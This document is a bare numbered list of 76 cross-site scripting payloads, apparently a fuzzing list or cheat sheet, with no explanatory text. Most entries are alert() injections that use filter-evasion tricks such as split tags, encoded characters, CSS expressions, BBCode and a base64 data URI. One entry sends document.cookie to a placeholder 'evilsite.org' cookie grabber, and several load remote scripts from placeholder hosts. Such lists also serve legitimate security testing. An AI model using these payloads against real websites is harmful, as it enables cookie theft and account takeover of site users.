1. <script>alert(1);</script>
  2. <script>alert('XSS');</script>
  3. <script src="http://www.evilsite.org/cookiegrabber.php"></script>
  4. <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
  5. <scr<script>ipt>alert('XSS');</scr</script>ipt>
  6. <script>alert(String.fromCharCode(88,83,83))</script>
  7. <img src=foo.png onerror=alert(/xssed/) />
  8. <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
  9. <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
  10. <marquee><script>alert('XSS')</script></marquee>
  11. <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
  12. <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
  13. <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
  14. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  15. "><script>alert(0)</script>
  16. <script src=http://yoursite.com/your_files.js></script>
  17. </title><script>alert(/xss/)</script>
  18. </textarea><script>alert(/xss/)</script>
  19. <IMG LOWSRC=\"javascript:alert('XSS')\">
  20. <IMG DYNSRC=\"javascript:alert('XSS')\">
  21. <font style='color:expression(alert(document.cookie))'>
  22. '); alert('XSS
  23. <img src="javascript:alert('XSS')">
  24. <script language="JavaScript">alert('XSS')</script>
  25. [url=javascript:alert('XSS');]click me[/url]
  26. <body onunload="javascript:alert('XSS');">
  27. <body onLoad="alert('XSS');"
  28. [color=red' onmouseover="alert('xss')"]mouse over[/color]
  29. "/></a></><img src=1.gif onerror=alert(1)>
  30. window.alert("Bonjour !");
  31. <div style="x:expression((window.r==1)?'':eval('r=1;
  32. alert(String.fromCharCode(88,83,83));'))">
  33. <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
  34. "><script alert(String.fromCharCode(88,83,83))</script>
  35. '>><marquee><h1>XSS</h1></marquee>
  36. '">><script>alert('XSS')</script>
  37. '">><marquee><h1>XSS</h1></marquee>
  38. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
  39. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
  40. <script>var var = 1; alert(var)</script>
  41. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  42. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
  43. <IMG SRC='vbscript:msgbox(\"XSS\")'>
  44. " onfocus=alert(document.domain) "> <"
  45. <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
  46. <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
  47. perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
  48. perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
  49. <br size=\"&{alert('XSS')}\">
  50. <scrscriptipt>alert(1)</scrscriptipt>
  51. </br style=a:expression(alert())>
  52. </script><script>alert(1)</script>
  53. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  54. [color=red width=expression(alert(123))][color]
  55. <BASE HREF="javascript:alert('XSS');//">
  56. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
  57. "></iframe><script>alert(123)</script>
  58. <body onLoad="while(true) alert('XSS');">
  59. '"></title><script>alert(1111)</script>
  60. </textarea>'"><script>alert(document.cookie)</script>
  61. '""><script language="JavaScript"> alert('X \nS \nS');</script>
  62. </script></script><<<<script><>>>><<<script>alert(123)</script>
  63. <html><noalert><noscript>(123)</noscript><script>(123)</script>
  64. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  65. '></select><script>alert(123)</script>
  66. '>"><script src = 'http://www.site.com/XSS.js'></script>
  67. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
  68. <SCRIPT>document.write("XSS");</SCRIPT>
  69. a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
  70. ='><script>alert("xss")</script>
  71. <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
  72. <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
  73. ">/PlanetCreator/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
  74. ">/PlanetCreator/><script>alert(document.cookie)</script>
  75. src="http://www.site.com/XSS.js">
  76. data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
